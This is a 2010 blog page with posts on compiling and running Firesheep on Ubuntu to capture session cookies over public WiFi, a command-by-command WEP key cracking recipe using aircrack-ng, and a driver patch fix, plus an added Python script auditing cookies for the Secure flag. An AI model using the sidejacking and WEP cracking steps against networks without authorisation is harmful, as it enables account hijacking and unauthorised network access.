Friday, November 19, 2010

Compiling Firesheep on Linux

If you follow the (security) news a bit, you've undoubtedly heard about Firesheep. This tool makes it very easy to listen in on public WiFi connections and intercept HTTP cookies from a plethora of social networking sites and mail services.

This has been possible for a long time (some tcpdump filters and some cookie setting scripts and you're golden), but this tool makes it insanely easy. You can check out the tool and its description on the main site.
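The interception works because these sites send their session cookies over plain HTTP. As an added example (not from the post, and not part of Firesheep or Blacksheep), here is a small Python check a site owner can run over captured response headers: it parses Set-Cookie lines from a constructed sample and flags cookies that lack the Secure attribute and would therefore be readable by anyone sniffing the same open network.

```python
"""Audit Set-Cookie headers for the attributes that keep session cookies off
plaintext HTTP. Constructed example; the header sample below is made up."""
import re
from typing import Dict, List

# Constructed sample of raw response headers, as a proxy or test client
# might capture them (not from any real site).
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Set-Cookie: sessionid=abc123; Path=/; HttpOnly
Set-Cookie: csrftoken=tok456; Path=/; Secure; HttpOnly
Set-Cookie: prefs=dark; Path=/
Content-Type: text/html
"""

# Names that usually identify a session/auth cookie (heuristic).
SESSION_NAME_HINT = re.compile(r"sess|auth|token|login", re.IGNORECASE)


def parse_set_cookie(value: str) -> Dict[str, object]:
    """Split one Set-Cookie value into name, value and attribute flags."""
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return {"name": name.strip(), "value": val,
            "secure": "secure" in attrs, "httponly": "httponly" in attrs}


def audit_cookies(raw_headers: str) -> List[str]:
    """Return findings for cookies a Firesheep-style sniffer could lift.

    A cookie without Secure is also sent on plain http:// requests, so anyone
    on the same open WiFi can read it; a likely session cookie without it is
    the critical finding. HttpOnly does not stop sniffing, only script access."""
    findings = []
    for hdr in raw_headers.splitlines():
        if not hdr.lower().startswith("set-cookie:"):
            continue
        c = parse_set_cookie(hdr.split(":", 1)[1])
        if not c["secure"]:
            sev = "CRITICAL" if SESSION_NAME_HINT.search(c["name"]) else "low"
            findings.append(f"{sev}: {c['name']} lacks Secure (sniffable over HTTP)")
        if not c["httponly"]:
            findings.append(f"info: {c['name']} lacks HttpOnly")
    return findings


if __name__ == "__main__":
    for finding in audit_cookies(SAMPLE_HEADERS):
        print(finding)
```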

The site mentions that Linux support is on the way, and recently it has become possible to successfully compile the tool on Linux. This is what I did to get it running on Ubuntu 10.10.

cd ~
git clone git://github.com/mickflemm/firesheep.git
cd firesheep/
./autogen.sh --with-xulrunner-sdk=/usr/lib/xulrunner-devel-1.9.2.12

This configures the makefile, but it will probably fail until you have installed all the right dependencies. Below are the ones I was missing; yours might differ! Check the output for hints on which package you need to install.

sudo apt-get install libxul-dev xulrunner-dev libpcap-dev libhal-dev
# Now configure should succeed:
./autogen.sh --with-xulrunner-sdk=/usr/lib/xulrunner-devel-1.9.2.12

We now need to make a small change to the makefile.

gedit mozpopen/Makefile

Change the MOZ_CFLAGS = ... line to:

MOZ_CFLAGS = -fshort-wchar -I/usr/lib/xulrunner-devel-1.9.2.12/include -I/usr/include/nspr

Now we start compiling.

make

This will probably fail with the message:

make[1]: *** No rule to make target `deps/http-parser/http_parser.c', needed by `../xpi/platform/.../firesheep-backend'.  Stop.

This is fixed by running a submodule update:

git submodule update --init

And make again:

make

You'll now have an extension in the build directory. Drag the .xpi to Firefox to install Firesheep, then close Firefox completely.

Firesheep expects your wireless interface to be in monitor mode. The easiest way to do this is to use airmon-ng:

sudo airmon-ng start eth1 #Substitute your wireless interface name

Now start Firefox with root rights:

sudo firefox

Go to Tools → Add-ons, and open the Firesheep Preferences under the Extensions view. Another window opens. Set the Capture Interface to mon0.

Press CTRL+SHIFT+S to open the Firesheep sidebar and to start capturing.

Good luck. Also, be sure to check out Blacksheep, a tool to detect Firesheep tampering on your network.

Wednesday, November 03, 2010

Aircrack Quick Tutorial (Wireless WEP Cracking)

Speaking of wireless. The following is just a quick note-to-self, because I always forget the exact commands and end up crawling around the Aircrack wiki for a bit. I thought I'd posted this before, but I can't seem to find it.

TTY1$ sudo airmon-ng start eth1
# Assume monitor started on mon0.
TTY1$ sudo airodump-ng mon0
# Scout interesting APs and focus:
TTY1$ sudo airodump-ng --channel X --bssid XX:XX:XX:XX:XX:XX -w output mon0
# OK, this terminal is dumping data. Open a new one.

TTY2$ sudo aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX mon0
# ... Association successful :-)

# Now start the attack. I like opening a new terminal for this.
# Don't bother with the ARP request replay attack.
# The best method to use is the -p 0841 one, especially when using
# a crappy wifi chip like me (3945ABG). Last time I checked, the
# advanced attack methods (KoreK chopchop, fragmentation, caffe-
# latte and Hirte) didn't work.
TTY3$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX mon0

# Wait until a packet is captured. It's best to use a small one (Size: 68).
# Reinject and the data-counter in TTY1 (airodump) should go up. Now get cracking:
TTY4$ sudo aircrack-ng -b XX:XX:XX:XX:XX:XX output*.cap

# And, optional:
TTY5$ sudo aircrack-ng -K -b XX:XX:XX:XX:XX:XX output*.cap

Ubuntu 10.10: "fixed channel mon0: -1" Aircrack Problem With iwl3945

Update for Ubuntu 12.04 users: see this post.

* * *

After upgrading to Ubuntu Maverick, the Aircrack suite stopped working.

After setting airodump-ng to a channel (like usual):

airodump-ng --channel X mon0

it still displayed its status as:

fixed channel mon0: -1

Some forum users advised using:

airodump-ng --channel X,X mon0

But this didn't work. For the record, I'm using a Thinkpad X60 with the iwl3945 driver. lshw output:

  *-network
       description: Wireless interface
       product: PRO/Wireless 3945ABG [Golan] Network Connection
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:03:00.0
       logical name: eth1
       version: 02
       width: 32 bits
       clock: 33MHz
       capabilities: bus_master cap_list ethernet physical wireless

Luckily, there is an easy-to-follow thread on the forums which fixes the problem for a similar card. This solution also worked with my 3945ABG.

Here are the commands:

wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo modprobe iwl3945

Alternatively, you can also use sudo reboot instead of sudo modprobe if you're unsure which driver module you need to load.

Aircrack should work fine again now. Note that kernel updates might overwrite the module again (and, hopefully, fix the bug at the same time).